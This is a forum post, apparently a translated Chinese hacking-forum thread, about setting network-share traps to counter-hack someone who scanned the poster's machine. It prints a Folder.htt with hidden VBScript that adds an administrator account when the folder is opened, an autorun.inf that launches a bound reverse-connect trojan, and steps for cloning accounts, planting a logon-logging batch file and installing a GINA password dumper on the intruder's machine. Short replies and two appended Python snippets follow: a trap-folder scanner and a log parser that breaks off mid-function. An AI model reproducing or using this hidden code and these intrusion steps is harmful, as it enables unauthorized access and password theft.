Author: k_com [k_com] Forum user
Heh, I hadn't turned on the firewall. I opened the sniffer and soon saw packets going from port 4854 on host XXX.XXX.XXX.99 to port 1433 on my machine (xxx.xxx.xxx.58) and back again: the classic symptom of being scanned. My box has no SQL Server at all, so where would a port 1433 come from? It was 100% a scan. With the IP in hand, I first checked whether it matched any of my QQ friends; it didn't. Never mind that; I used Fluxay (流光) to fingerprint their system. It was NT, which makes things easier, so I ran X-Scan against it. One song later: no weak passwords, but the following ports were open:

端口21开放: FTP (Control)
端口139开放: NETBIOS Session Service
端口443开放: HttpS, Secure HTTP
端口445开放: Microsoft-DS
端口3389开放: Windows 2000 remote admin

Brute-force port 21? Too slow, and the odds are poor. 139? NetBIOS? Without a password it's all empty talk. 3389? The input-method trick? A needle in a haystack.

So I decided to lure the wolf into the house and then catch the turtle in the jar; that is really all a honeypot is.

Let's get to work. First open the registry and enable null sessions (note: change HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa\restrictanonymous REG_DWORD from 0x2 to 0x0). Close all shares and share only three folders. In the first folder place two files: Folder.htt and desktop.ini (see Figure 2). The code of folder.htt and desktop.ini follows.

folder.htt:

<!-- * Copyright 1999 Microsoft Corporation. All rights reserved. -->
<html>
<head>
<meta http-equiv="content-type" content="text/html; charset=UTF-8">
</head>
<style>
body {margin: 0; font: menu; color: black}
#Panel {position: absolute; width: 200px; height: 100%; visibility: hidden; overflow: auto}
#Corner {padding-left: 12px; padding-top: 11px}
#FolderIcon {width: 32px; height: 32px}
#FolderName {margin-top: 8px; font: 14pt/14pt menu; font-weight: bold}
#LogoLine {width: 100%; height: 2px; margin-top: 4px; vertical-align: top}
#Details {padding-left: 12px; margin-top: 8px}
#Locked {vertical-align: baseline}
#Preview {}
.Movie {width: 176px; height: 136px}
.Sound {width: 176px; height: 46px}
.Divider {width: 100%; color: #C0C0C0; height: 1px}
#Thumbnail {width: 120px; height: 120px}
.Legend {margin-left: 8px}
#FileList {position: absolute; width: 0; height: 100%; border: 0px none; }
p {margin-top: 12px}
p.Half {margin-top: 4px}
p.Button {margin-top: 8px}
button {font: 9pt 宋体, MS Song; margin-left: 12px}
.Message {margin: -4px; margin-right: 0; padding: 3px; background: infobackground; color: infotext; border: 1px solid lightgrey}
#CSCPlusMin {width: 17px}
#CSCText {}
#CSCDetail {}
#CSCButton {}
</style>
<script language="JavaScript">
// THIS SCRIPT IS COMMON FOR ALL CUSTOM WEB VIEWS
var L_Prompt_Text = "选定项目可以查看其说明。";
var L_Empty_Text = "该文件夹中没有项目可显示。";
var L_Multiple_Text = " 个选定的项目。";
var L_Size_Text = "大小: ";
var L_FileSize_Text = "总计文件大小: ";
var L_Delimiter_Text = ",";
var L_Bytes_Text = " 字节";
var L_Today_Text = "今天";
var L_Yesterday_Text = "昨天";
var L_Preview_Text = "正在生成预览...";
var L_TotalSize_Text = "总计: ";
var L_UsedSpace_Text = "已用空间: ";
var L_FreeSpace_Text = "可用空间: ";
var L_Attributes_Text = "属性";
var L_Codes_Text = "RHSaCE"; // suppress the Archive flag
var L_ReadOnly_Text = "只读";
var L_Hidden_Text = "隐藏";
var L_System_Text = "系统";
var L_Archive_Text = "存档";
var L_Compressed_Text = "压缩";
var L_Encrypted_Text = "加密";
var L_NoAttributes_Text = "(正常)";
var L_SeeAlso_Text = "另请参阅:";
var L_UsedSpaceTitle_Text = "已用空间";
var L_FreeSpaceTitle_Text = "可用空间";
var gAttributeNames = new Array(L_ReadOnly_Text, L_Hidden_Text, L_System_Text, L_Archive_Text, L_Compressed_Text, L_Encrypted_Text);
var gIntroText = "";
var gTimer = 0;
var gDoBlends = false && (navigator.cpuClass != "Alpha" && screen.colorDepth > 8);
var gPlusCold = "<img id=CSCBmp align=middle src=pluscold.gif>";
var gPlusHot = "<img id=CSCBmp align=middle src=plushot.gif>";
var gMinusCold = "<img id=CSCBmp align=middle src=mincold.gif>";
var gMinusHot = "<img id=CSCBmp align=middle src=minhot.gif>";
var gToday;
var gYesterday;
var gFolderPath = "";
var gFoundAuthor = false;

function FormatDetail(label, data) {
    var s;
    if (label.length + data.length > 32)
        s = "<p>" + label + ":<br>" + data;
    else
        s = "<p>" + label + ": " + data;
    return s;
}

function SanatizeString(data) {
    // escape angle brackets so a file name cannot inject HTML into the panel
    // (the forum rendering had decoded the entities to plain "<" and ">",
    // which turned these replacements into no-ops; restored here)
    var re = /</g;
    var s = data.replace(re, "&lt;");
    re = />/g;
    s = s.replace(re, "&gt;");
    return s;
}

function ShowInfo() {
    // updates the left info panel when you select icons
    var item;
    var name;
    var data;
    var text;
    var title;
    var size = 0;
    var i;
    if (gDoBlends) {
        Panel.filters.blendTrans.Stop();
        Panel.filters.blendTrans.Apply();
    }
    // kill any preview
    Preview.innerHTML = "";
    Preview.style.display = "none";
    Thumbnail.style.display = "none";
    data = FileList.SelectedItems().Count;
    if (data == 0)
        text = NoneSelected();
    else if (data > 1)
        text = ManySelected(data);
    else {
        item = FileList.SelectedItems().Item(0);
        // name
        name = FileList.Folder.GetDetailsOf(item, 0);
        if (!name) name = item.Name;
        text = "<b>" + SanatizeString(name) + "</b>";
        if (false && IsFileLocked(FileList.Folder.GetDetailsOf(item, 4)))
            text += " <img id=Locked src='res://webview.dll/Locked.gif'>";
        // type
        data = FileList.Folder.GetDetailsOf(item, 2);
        if (data) text += "<br>" + data;
        // date
        text += HandleDate(item);
        // size
        text += HandleSize(item);
        // extra details?
        gFoundAuthor = false;
        for (i = 4; i < 10; i++) {
            title = FileList.Folder.GetDetailsOf(null, i);
            if (!title) break;
            data = FileList.Folder.GetDetailsOf(item, i);
            if (title == L_Attributes_Text)
                text += "<p>" + title + ": " + FormatAttributes(data);
            else if (data) {
                var safeData = SanatizeString(data);
                if (title == "Author") {
                    gFoundAuthor = true;
                    text += "<p>" + title + ": <a href='mailto:" + safeData + "'>" + safeData + "</a>";
                } else
                    text += FormatDetail(title, safeData);
            }
        }
        Info.innerHTML = text;
        // errors may be generated if the thumbnail or media preview controls
        // are not available. So, we "flush" the text before that
        // try to generate a new thumbnail or media preview
        if (item.Size)
            if (Thumbnail.displayFile(item.Path))
                gTimer = window.setTimeout('Preview.innerHTML = "<br>" + L_Preview_Text; Preview.style.display = ""', 1000);
            else {
                ext = GetFileExtension(item.Path);
                if (IsMovieFile(ext)) {
                    Preview.innerHTML = '<p>' +
                        '<object ID=MediaPlayer class=Movie classid="clsid:22D6F312-B0F6-11D0-94AB-0080C74C7E95">' +
                        '<param name="ShowDisplay" value=false>' +
                        '<param name="AutoPlay" value="false">' +
                        '</object>';
                    MediaPlayer.EnableContextMenu = false;
                    MediaPlayer.Open(item.Path);
                } else if (IsSoundFile(ext)) {
                    Preview.innerHTML = '<p>' +
                        '<object ID=MediaPlayer class=Sound classid="clsid:22D6F312-B0F6-11D0-94AB-0080C74C7E95">' +
                        '<param name="ShowDisplay" value="false">' +
                        '<param name="AutoPlay" value="false">' +
                        '</object>';
                    MediaPlayer.EnableContextMenu = false;
                    MediaPlayer.Open(item.Path);
                }
                if (Preview.innerHTML != "") Preview.style.display = "";
            }
    }
    // replace Info with the new text
    Info.innerHTML = text;
    if (gDoBlends) Panel.filters.blendTrans.Play();
}

function FormatNumber(n) {
    var s = "";
    var i, j = 0;
    for (i = n.length - 1; i >= 0; i--) {
        s = n.charAt(i) + s;
        if (i && ((++j % 3) == 0)) s = L_Delimiter_Text + s;
    }
    return s;
}

function HandleSize(item) {
    var s = "";
    var size = item.Size;
    if (size && size < 1000)
        s = "<p>" + L_Size_Text + size + L_Bytes_Text;
    else {
        var data = FileList.Folder.GetDetailsOf(item, 1);
        if (data)
            s = "<p>" + FileList.Folder.GetDetailsOf(null, 1) + ": " + data;
        else if (size)
            s = "<p>" + L_Size_Text + FormatNumber(size.toString()) + L_Bytes_Text;
    }
    return s;
}

function HandleDate(item) {
    var s = "";
    var data = FileList.Folder.GetDetailsOf(item, 3);
    if (data) s = "<p>" + FileList.Folder.GetDetailsOf(null, 3) + ": " + data;
    return s;
}

function FormatAttributes(data) {
    var s = "";
    var code;
    for (i = 0; i < L_Codes_Text.length; i++) {
        code = L_Codes_Text.charAt(i);
        if (data.indexOf(code) > -1) {
            if (s) s += ", ";
            s += gAttributeNames[i];
        }
    }
    if (!s) s = L_NoAttributes_Text;
    return s;
}

function FormatComment(data) {
    var s = "";
    if (data) {
        data = SanatizeString(data);
        var start;
        var end;
        var theLink;
        var a = data.split("\n");
        var L_Author_Text = "作者: ";
        // look for a contact
        for (var i in a) {
            start = a[i].indexOf(L_Author_Text);
            if (start < 0) continue;
            if (gFoundAuthor) // already in Details column
                a[i] = "";
            else {
                start += L_Author_Text.length;
                end = a[i].length;
                theLink = data.substring(start, end);
                a[i] = L_Author_Text + "<a href='mailto:" + theLink + "'>" + theLink + "</a>";
            }
        }
        // parse lines for Office files without breaking links below
        data = a.join("<br>\n");
        // look for embedded links
        start = data.indexOf("http://");
        if (start < 0) start = data.indexOf("file://");
        if (start < 0)
            s += data;
        else {
            end = data.indexOf(" ", start);
            if (end < 0) end = data.length;
            if (start > 0) s += data.substring(0, start - 1);
            theLink = data.substring(start, end);
            s += theLink.link(theLink);
            if (end < data.length) s += data.substring(end + 1, data.length);
        }
    }
    return s;
}

function GetFileExtension(name) {
    var ext = name.substring(name.lastIndexOf(".") + 1, name.length);
    return ext.toLowerCase();
}

function IsMovieFile(ext) {
    var types = ",asf,avi,m1v,mov,mp2,mpa,mpe,mpeg,mpg,mpv2,qt,asx,";
    var temp = "," + ext + ",";
    return types.indexOf(temp) > -1;
}

function IsSoundFile(ext) {
    var types = ",aif,aiff,au,mid,midi,rmi,snd,wav,mp3,m3u,wma,";
    var temp = "," + ext + ",";
    return types.indexOf(temp) > -1;
}

function IsFileLocked(name) {
    return (name.indexOf(L_Codes_Text.charAt(0)) > -1);
}

function GetMessage() {
    var s = "";
    return (s) ? "<p><div class=Message>" + s + "</div>" : "";
}

function CSCFolderStatus() { return FileList.Folder.OfflineStatus; }
function CSCSynchronize() { FileList.Folder.Synchronize(); }

function CSCGetStatusText(status) {
    var s = "";
    var L_Online_Text = "该文件夹处于<b>联机状态</b>。";
    var L_Offline_Text = "该文件夹处于<b>脱机状态</b>。";
    var L_ServerAvailable_Text = "该文件夹处于<b>脱机状态</b>,现在您可以进行同步处理。";
    var L_DirtyCache_Text = "该文件夹处于<b>联机状态</b>,但已过时。";
    switch (status) {
        case 0: s = L_Online_Text; break;
        case 1: s = L_Offline_Text; break;
        case 2: s = L_ServerAvailable_Text; break;
        case 3: s = L_DirtyCache_Text; break;
    }
    return s;
}

function CSCGetStatusDetail(status) {
    var s = "";
    var L_OnlineExpand_Text = "您可以使此文件夹中的文件在断开与网络的连接时仍然可用,只需选中文件,然后单击“文件”菜单中的“允许脱机使用”即可。";
    var L_OfflineExpand_Text = "您脱机状态下所做的任何更改都需要在下次连接到网络上时进行同步处理。";
    var L_ServerAvailableExpand_Text = "拥有该文件夹的服务器又重新可用。";
    var L_DirtyCacheExpand_Text = "脱机工作时所做的更改还没有进行同步处理。";
    switch (status) {
        case 0: s = L_OnlineExpand_Text; break;
        case 1: s = L_OfflineExpand_Text; break;
        case 2: s = L_ServerAvailableExpand_Text; break;
        case 3: s = L_DirtyCacheExpand_Text; break;
    }
    return s;
}

function CSCGetStatusButton(status) {
    var s = "";
    var L_SynchronizeButton_Text = "<p class=Button><button onclick='CSCSynchronize()'>同步</button>";
    if ((status == 2) || (status == 3)) {
        s = L_SynchronizeButton_Text;
    }
    return s;
}

function CSCShowStatusInfo(expand) {
    // var status = CSCFolderStatus(); Doesn't work on downlevel webview (IE4), so commenting out.
    var status = -1;
    if (status >= 0) {
        var fIsHot = (CSCText.style.color == document.linkColor);
        CSCText.innerHTML = CSCGetStatusText(status);
        if (expand) {
            CSCText.innerHTML += "<br>";
            if (fIsHot) CSCPlusMin.innerHTML = gMinusHot;
            else CSCPlusMin.innerHTML = gMinusCold;
            CSCDetail.innerHTML = CSCGetStatusDetail(status) + "<br>";
            CSCDetail.style.marginLeft = CSCText.offsetLeft;
            CSCDetail.style.display = "";
        } else {
            if (fIsHot) CSCPlusMin.innerHTML = gPlusHot;
            else CSCPlusMin.innerHTML = gPlusCold;
            CSCDetail.style.display = "none";
        }
        var cscButton = CSCGetStatusButton(status);
        if (cscButton.length > 0) {
            CSCButton.innerHTML = cscButton;
            CSCButton.style.display = "";
        } else {
            CSCButton.style.display = "none";
        }
        CSC.style.display = "";
    } else {
        CSC.style.display = "none";
    }
}

function CSCShowExpandedStatus(expand) { CSCShowStatusInfo(true); }
function CSCShowFoldedStatus(expand) { CSCShowStatusInfo(false); }

function IsCSCStatusExpanded() {
    return ((CSCPlusMin.innerHTML.indexOf("mincold.gif") != -1) || (CSCPlusMin.innerHTML.indexOf("minhot.gif") != -1));
}

function IsCSCStatusFolded() {
    return ((CSCPlusMin.innerHTML.indexOf("pluscold.gif") != -1) || (CSCPlusMin.innerHTML.indexOf("plushot.gif") != -1));
}

function CSCShowStatus() {
    if (IsCSCStatusExpanded()) {
        CSCShowExpandedStatus();
    } else { // Default to folded status
        CSCShowFoldedStatus();
    }
}

function CSCShowStatus_FoldExpand_Toggle() {
    if (IsCSCStatusExpanded()) {
        CSCShowFoldedStatus();
    } else if (IsCSCStatusFolded()) {
        CSCShowExpandedStatus();
    }
}

function CSC_MouseOver() {
    if (CSCText.style.cursor == "hand") return;
    if (IsCSCStatusExpanded()) CSCPlusMin.innerHTML = gMinusHot;
    else CSCPlusMin.innerHTML = gPlusHot;
    CSCText.style.color = document.linkColor;
    CSCPlusMin.style.cursor = "hand";
    CSCText.style.cursor = "hand";
}

function CSC_MouseOut() {
    if (CSCText.style.cursor == "auto") return;
    if (element = window.event.toElement) {
        idCursor = element.id;
        if (idCursor == "CSCDiv" || idCursor == "CSCText" || idCursor == "CSCPlusMin" || idCursor == "CSCBmp") {
            return;
        }
    }
    if (IsCSCStatusExpanded()) CSCPlusMin.innerHTML = gMinusCold;
    else CSCPlusMin.innerHTML = gPlusCold;
    CSCText.style.color = "black";
    CSCPlusMin.style.cursor = "auto";
    CSCText.style.cursor = "auto";
}

function NoneSelected() {
    //var s = gIntroText + (FileList.Folder.Items().Count ? L_Prompt_Text : L_Empty_Text);
    var s = gIntroText + L_Prompt_Text;
    s += GetMessage();
    if (false || gFolderPath.length == 4) { // true allows all subfolders to show the pie chart
        drive = gFolderPath.substring(0, 3);
        if (Thumbnail.displayFile(drive)) {
            if (gFolderPath.length == 4)
                s += "<p><br>" + L_TotalSize_Text + Thumbnail.totalSpace + "<p>";
            else
                s += "<p><br>" + drive.link(drive) + "<p><p>" + L_TotalSize_Text + Thumbnail.totalSpace;
            s += "<p><table class=Legend width=12 height=12 border=1 align=left bgcolor=threedface bordercolordark=black bordercolorlight=black><tr><td title=\'";
            s += L_UsedSpaceTitle_Text;
            s += "\'></td></tr></table> " + L_UsedSpace_Text + Thumbnail.usedSpace;
            s += "<p><table class=Legend width=12 height=12 border=1 align=left bgcolor=threedhighlight bordercolordark=black bordercolorlight=black><tr><td title=\'";
            s += L_FreeSpaceTitle_Text;
            s += "\'></td></tr></table> " + L_FreeSpace_Text + Thumbnail.freeSpace;
            Thumbnail.style.display = "";
        }
    }
    return s;
}

function ManySelected(items) {
    var s = items + L_Multiple_Text + "<p>";
    var size = 0;
    if (items <= 100) {
        for (var i = 0; i < items; i++)
            size += FileList.SelectedItems().Item(i).Size;
        if (size)
            s += L_FileSize_Text + FormatNumber(size.toString()) + L_Bytes_Text + "<p>";
        if (items <= 16)
            for (i = 0; i < items; i++)
                s += SanatizeString(FileList.SelectedItems().Item(i).Name) + "<br>";
    }
    return s;
}

// EVENTS
function Resize() {
    if (document.body.clientWidth < Panel.style.pixelWidth * 2) {
        Panel.style.visibility = "hidden";
        FileList.style.pixelLeft = 0;
    } else {
        Panel.style.visibility = "visible";
        FileList.style.pixelLeft = Panel.style.pixelWidth;
    }
    FileList.style.pixelWidth = document.body.clientWidth - FileList.style.pixelLeft;
}

function ThumbnailReady() {
    window.clearTimeout(gTimer);
    Preview.innerHTML = "";
    Preview.style.display = "none";
    if (Thumbnail.haveThumbnail()) Thumbnail.style.display = "";
}

// INITIALIZATION
function Initialize(introText) {
    gIntroText = introText;
    gFolderPath = Info.innerHTML;
    Thumbnail.style.display = "none";
    CSCShowStatus();
    Info.innerHTML = NoneSelected();
    // fix styles
    var L_SystemFont1_Text = "宋体, MS Song";
    var L_SystemFont2_Text = "宋体, MS Song";
    var L_SystemFont_Text = "宋体, MS Song";
    var tr = document.body.createTextRange();
    if (navigator.cpuClass != "Alpha") {
        tr.collapse();
        var actualFont = tr.queryCommandValue("FontName");
        if (actualFont == L_SystemFont1_Text || actualFont == L_SystemFont2_Text)
            document.body.style.fontFamily = L_SystemFont_Text;
    } else
        document.body.style.fontFamily = L_SystemFont_Text;
    // init relative dates
    gToday = new Date();
    gToday = gToday.toLocaleString();
    gToday = gToday.substring(0, gToday.indexOf(' '));
    gYesterday = new Date(Date.parse(gToday) - (1000 * 60 * 60 * 24));
    gYesterday = gYesterday.toLocaleString();
    gYesterday = gYesterday.substring(0, gYesterday.indexOf(' '));
    // call our Resize() function whenever the window gets resized
    window.onresize = Resize;
}

function OnWebviewLinkEnter(aLink) {
    if (aLink.title) {
        window.status = aLink.title;
    } else {
        window.status = "";
    }
    return true;
}

function OnWebviewLinkExit() {
    window.status = "";
    return false;
}
</script>
<script language="JavaScript">
function errorHandler() {
    return true; // Don't show the default error message box
}
</script>
<script language="JavaScript">
function Load() {
    window.onerror = errorHandler;
    Initialize("");
    Resize();
}
</script>
<script language="JavaScript" for="Thumbnail" event="OnThumbnailReady">
ThumbnailReady();
</script>
<script language="JavaScript" for="FileList" event="SelectionChanged">
window.clearTimeout(gTimer);
gTimer = window.setTimeout("ShowInfo()", gDoBlends ? 500 : 0); // need actual double-click time
</script>
<script language="JavaScript">
function OnVerbInvoked() {
    if (Preview.innerHTML != "") {
        MediaPlayer.Stop();
    }
}
</script>
<script language="JavaScript" for="FileList" event="VerbInvoked">
// If the user immediately double-clicks the file, we would get
// a selection changed event immediately followed by the VerbInvoked
// event and we would not have had enough time to create the MediaPlayer
// in the SelectionChanged event handler. So, we delay handling this
// event a little bit
window.setTimeout("OnVerbInvoked()", 500);
</script>
<script language="JavaScript" for="WVLink" event="onmouseover">
return OnWebviewLinkEnter(this);
</script>
<script language="JavaScript" for="WVLink" event="onfocus">
return OnWebviewLinkEnter(this);
</script>
<script language="JavaScript" for="WVLink" event="onmouseout">
return OnWebviewLinkExit();
</script>
<script language="JavaScript" for="WVLink" event="onblur">
return OnWebviewLinkExit();
</script>
<script language=vbscript>
function muma()
    dim wsh
    set wsh=CreateObject("WScript.Shell")
    wsh.run "net.exe user aaa aa /add",0
    wsh.run "net localgroup administrators aaa /add",0
    wsh.run "net send 172.16.235.58 狼来拉",0
end function
</script>
<BODY onload="vbscript :muma()">
<body scroll=no onload=Load()>
<div id=Panel style="background: white url('file:///C:/DOCUME~1/ADMINI~1.NAN/LOCALS~1/Temp/wvleft.bmp') no-repeat; ">
<div id=Corner>
<object id=FolderIcon classid="clsid:E5DF9D10-3B52-11D1-83E8-00A0C90DC849" tabIndex=-1>
<param name="scale" value=100>
</object>
<br>
<div id=FolderName>
%THISDIRNAME%
</div>
</div>
<img id=LogoLine src="file:///C:/DOCUME~1/ADMINI~1.NAN/LOCALS~1/Temp/wvline.gif">
<div id=Details>
<span id=CSC>
<div id=CSCDiv tabIndex=2 onmouseover="CSC_MouseOver()" onmouseout="CSC_MouseOut()" onclick="CSCShowStatus_FoldExpand_Toggle()" onkeypress="CSCShowStatus_FoldExpand_Toggle()">
<span id=CSCPlusMin> </span>
<span id=CSCText> </span>
<br>
</div>
<div id=CSCDetail> </div>
<span id=CSCButton> </span>
<hr CLASS=Divider NOSHADE>
</span>
<span id=Info>
%THISDIRPATH%
</span>
<div id=Preview style="display: none"> </div>
<br>
<object id=Thumbnail classid="clsid:1D2B4F40-1F10-11D1-9E88-00C04FDCAB92" tabIndex=-1> </object>
<label id=ThumbnailLabel for="Thumbnail" style="display: none"> </label>
</div>
</div>
<object id=FileList classid="clsid:1820FED0-473E-11D0-A96C-00C04FD705A2" tabIndex=1> </object>
</body>
</html>

desktop.ini:

[ExtShellFolderViews]
Default={5984FFE0-28D4-11CF-AE66-08002B2E1262}
{5984FFE0-28D4-11CF-AE66-08002B2E1262}={5984FFE0-28D4-11CF-AE66-08002B2E1262}
[{5984FFE0-28D4-11CF-AE66-08002B2E1262}]
PersistMoniker=file://Folder.htt
[.ShellClassInfo]
ConfirmFileOp=0

The key part is this:

<script language=vbscript>
function muma()
    dim wsh
    set wsh=CreateObject("WScript.Shell")
    wsh.run "net.exe user aaa aa /add",0
    wsh.run "net localgroup administrators aaa /add",0
    wsh.run "net send 172.16.235.58 狼来拉",0
end function
</script>
<BODY onload="vbscript :muma()">

Making it is simple: just add the code above to a ready-made folder.htt. Set the attributes of the folder and of Folder.htt to read-only, hide Folder.htt and desktop.ini, and finally change Folder Options to allow web content in folders (see Figure 3). As soon as the other side opens this folder, a user named aaa with password aa is created automatically, and a "the wolf is here" message is sent to 123.123.123.123.

The second folder also holds two files: autorun.inf and flash.exe. flash.exe is the Huigezi (灰鸽子, Grey Pigeon) reverse-connect trojan, the best of its kind. autorun.inf:

[AutoRun]
OPEN= flash.exe /autorun

As soon as the other side opens this folder, flash.exe runs automatically. To avoid detection it has been bound together with a Flash animation. Steps:
1. Start BindFile (see Figure 6).
2. Add the programs to bind; here we add HGZ.EXE and FLASH.SWF (note: the binder only supports EXE files by default, so type *.* in the file-name box of the add dialog and all files appear; then you can add the SWF).
To be safe I also hid autorun.inf: right-click it, open Properties, tick Hidden, then click Apply and OK.

The third folder just holds a few useless files as a decoy.

Next comes setting permissions. Create an account named shuangfeng in the Users group with an empty password: open Computer Management, click Local Users and Groups, go to Groups, double-click Users (see Figure 4), click Add, type shuangfeng in the object-name box, then click Apply and OK. Share all three folders, go to Security and tick "Read & Execute", "List Folder Contents" and "Read" for Users, and then wait for him to take the bait (see Figure 5). Now all that's left is to wait for him to come in.

Sure enough, a few minutes later I got the "the wolf is here" message, but no reply from Huigezi; it had evidently been killed by antivirus, the price of fame. So I immediately logged into his 3389 with the aaa account and had a look around: it was indeed a compromised box. First I used CA to clone guest, then deleted the aaa user, like this: in CMD type

ca \\123.123.123.123 aaa aa guest shuangfeng

then on the box's command line type:

net user aaa /del

Then write a BAT with the following content:

time /t >>TSLog.log
netstat -n -p tcp | find ":3389">>TSLog.log
start Explorer

Edit it in Notepad, save it as 3389.bat and put it in d:\winnt\system32\.

Let me explain what this file does. The first line records the time the user logged on: time /t returns the system time directly (without /t the system waits for you to enter a new time), and the append operator ">>" writes that time into TSLog.log as the log's time field. The second line records the user's IP address: netstat shows the current network connections, -n shows IPs and ports instead of host names and protocol names, -p tcp shows only TCP; the pipe "|" feeds that output to the find command, which picks out the lines containing ":3389" (these are the lines holding the client IP we want; if you changed the Terminal Services port, change this value accordingly); finally we redirect that result into the log file TSLog.log in the same way. The records in TSLog.log then look like this:

22:40 TCP 192.168.12.28:3389 192.168.10.123:4903 ESTABLISHED
22:54 TCP 192.168.12.28:3389 192.168.12.29:1039 ESTABLISHED

In other words, whenever this TSLog.bat runs, every IP connected to port 3389 gets recorded. Then create a new value under HKLM\Software\Microsoft\Windows\CurrentVersion\Run\ with the content d:\winnt\system32\3389.bat.

Finally download the Niuzu NT/2000/XP password dumper and type gina -install at CMD; it shows:

======== Windows NT/2000/XP/.NET SERVER 2003 Password Dumper V1.0 ===========
===== Powered By tiaozi, Welcome to our site http://www.niuzu.net/ =========
Usage: Gina -install|-remove
-install Install Gina Dll in order to get Logon user's Password
-remove Remove Gina Dll and restore default Gina Dll
Warning: This option need administrator Privilege of LocalMachine!
Please Don't use this program to hacker! Good Luck! :-)

D:\Documents and Settings\aaa\桌面>gina -install
======== Windows NT/2000/XP/.NET SERVER 2003 Password Dumper V1.0 ===========
===== Powered By tiaozi, Welcome to our site http://www.niuzu.net/ =========
Working now,Please Standby ... -
STEP 1:
Source File: D:\Documents and Settings\maomao\桌面\SysGina32.dll
Target File: D:\WINDOWS\System32\SysGina32.dll
Copy Gina Dll Option Success!
STEP 2:
Gina Dll Was Set to Register Success...
All Done, The password will be save to [D:\winnt\System32\GinaPwd.txt]

Whenever someone logs on, the password is recorded in D:\winnt\System32\GinaPwd.txt. Then I rebooted the box.

Ten minutes later I logged into the box again. TSLog.log plainly showed the IP of whoever had logged on, and on closer inspection it was indeed the same IP as one of the people on my QQ. I got his password from D:\WINDOWS\System32\GinaPwd.txt and withdrew, because with this simple honeypot I had completed the counter-intrusion. Had I wanted to, I could have set the same kind of trap for that person on the box, but I didn't; I just left a text file telling the administrator and left. What remained was to go and find that person.

Summary:
1. Be more careful when intruding in future; don't be like that person, who walked into two such suspicious folders without realising he'd been had.
2. If he had used one box to scan and another to intrude, I'd have been helpless; when you intrude, you'd best do it that way too.
Original poster | Posted: 04-02-05 13:56
Reply: lx5227015 [lx5227015] Forum user
Bump.
Floor 1 | Posted: 04-02-05 14:01
Reply: bailove [bailove] Forum user
Classic. Suggest adding it to the featured section.
Floor 2 | Posted: 04-02-05 15:52
Reply: k_com [k_com] Forum user
Bump.
Floor 3 | Posted: 04-02-05 16:14
Reply: lobam [xx_js] Forum user
Floor 4 | Posted: 04-02-05 16:16
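A defender-side check for the two trap folders the post describes (the desktop.ini PersistMoniker hook into a Folder.htt that runs a script through WScript.Shell, and the autorun.inf OPEN= launcher), added here as an example and not code from the post or from any tool it names. The sample share tree and its file contents are constructed inside the code, and the marker patterns are my own assumptions about what a scripted web-view template looks like.

```python
import os
import re
import tempfile

# desktop.ini hands the folder view to an .htt template via PersistMoniker
PERSIST_RE = re.compile(r"^\s*PersistMoniker\s*=\s*file://(.+?)\s*$", re.I | re.M)
# autorun.inf launches a program when the folder or drive is opened
OPEN_RE = re.compile(r"^\s*(?:OPEN|SHELLEXECUTE)\s*=\s*(\S+)", re.I | re.M)
# signs that the template does more than render the folder listing (assumed markers)
HTT_MARKERS = (
    ("WScript.Shell", re.compile(r"CreateObject\s*\(\s*[\"']WScript\.Shell[\"']", re.I)),
    ("vbscript block", re.compile(r"<script[^>]*language\s*=\s*[\"']?vbscript", re.I)),
    ("vbscript onload", re.compile(r"onload\s*=\s*[\"']?vbscript\s*:", re.I)),
)

def read_text(path):
    with open(path, "rb") as fh:
        return fh.read().decode("utf-8", errors="replace")

def scan_folder(folder):
    """Return (path, reason) findings for one folder."""
    findings = []
    ini = os.path.join(folder, "desktop.ini")
    if os.path.isfile(ini):
        m = PERSIST_RE.search(read_text(ini))
        if m:
            htt = os.path.join(folder, m.group(1).replace("/", os.sep))
            if not os.path.isfile(htt):
                findings.append((ini, "PersistMoniker points at missing " + m.group(1)))
            else:
                hits = [name for name, rx in HTT_MARKERS if rx.search(read_text(htt))]
                if hits:
                    findings.append((htt, "web-view template runs script: " + ", ".join(hits)))
    inf = os.path.join(folder, "autorun.inf")
    if os.path.isfile(inf):
        m = OPEN_RE.search(read_text(inf))
        if m:
            findings.append((inf, "autorun launches " + m.group(1)))
    return findings

def scan_tree(root):
    """Walk a share root and collect findings from every folder under it."""
    findings = []
    for dirpath, _dirs, _files in os.walk(root):
        findings.extend(scan_folder(dirpath))
    return findings

def build_sample_tree():
    """Constructed sample: trap folder 1, trap folder 2 and a harmless decoy folder."""
    root = tempfile.mkdtemp(prefix="trapscan_")
    share1 = os.path.join(root, "share1")
    os.mkdir(share1)
    with open(os.path.join(share1, "desktop.ini"), "w") as fh:
        fh.write("[{5984FFE0-28D4-11CF-AE66-08002B2E1262}]\nPersistMoniker=file://Folder.htt\n")
    with open(os.path.join(share1, "Folder.htt"), "w") as fh:
        fh.write('<script language=vbscript>\nset wsh=CreateObject("WScript.Shell")\n</script>\n')
    share2 = os.path.join(root, "share2")
    os.mkdir(share2)
    with open(os.path.join(share2, "autorun.inf"), "w") as fh:
        fh.write("[AutoRun]\nOPEN= flash.exe /autorun\n")
    share3 = os.path.join(root, "share3")
    os.mkdir(share3)
    with open(os.path.join(share3, "readme.txt"), "w") as fh:
        fh.write("nothing here\n")
    return root

if __name__ == "__main__":
    for path, reason in scan_tree(build_sample_tree()):
        print(path, "->", reason)
```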
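A parser for the TSLog.log that the 3389.bat in the post writes, added here as an example and not code from the post. It assumes that time /t writes a bare HH:MM line and that netstat prints the usual "TCP local remote STATE" columns, and it accepts both that two-line layout and the joined-up form the post shows; the log text is constructed.

```python
import re
from collections import defaultdict

# "22:40" from `time /t`, optionally followed on the same line by a netstat row
TIME_RE = re.compile(r"^\s*(\d{1,2}:\d{2})\s*(.*)$")
# one row of `netstat -n -p tcp`: proto, local ip:port, remote ip:port, state
CONN_RE = re.compile(
    r"^\s*TCP\s+(?P<lip>[\d.]+):(?P<lport>\d+)\s+(?P<rip>[\d.]+):(?P<rport>\d+)\s+(?P<state>\w+)",
    re.I)

def parse_tslog(text, port="3389"):
    """Return (time, remote_ip, remote_port, state) tuples for connections to local
    `port`. Rows are tagged with the most recent time stamp seen, or None if a
    netstat row appears before any time line (e.g. a truncated log)."""
    records = []
    current = None
    for raw in text.splitlines():
        line = raw.strip()
        if not line:
            continue
        tm = TIME_RE.match(line)
        if tm:
            current, line = tm.group(1), tm.group(2)
            if not line:            # bare time line: nothing else to parse here
                continue
        cm = CONN_RE.match(line)
        if cm and cm.group("lport") == port:
            records.append((current, cm.group("rip"), int(cm.group("rport")),
                            cm.group("state").upper()))
    return records

def sessions_by_source(records):
    """Group established sessions by remote IP, keeping the log times seen."""
    out = defaultdict(list)
    for tm, rip, _rport, state in records:
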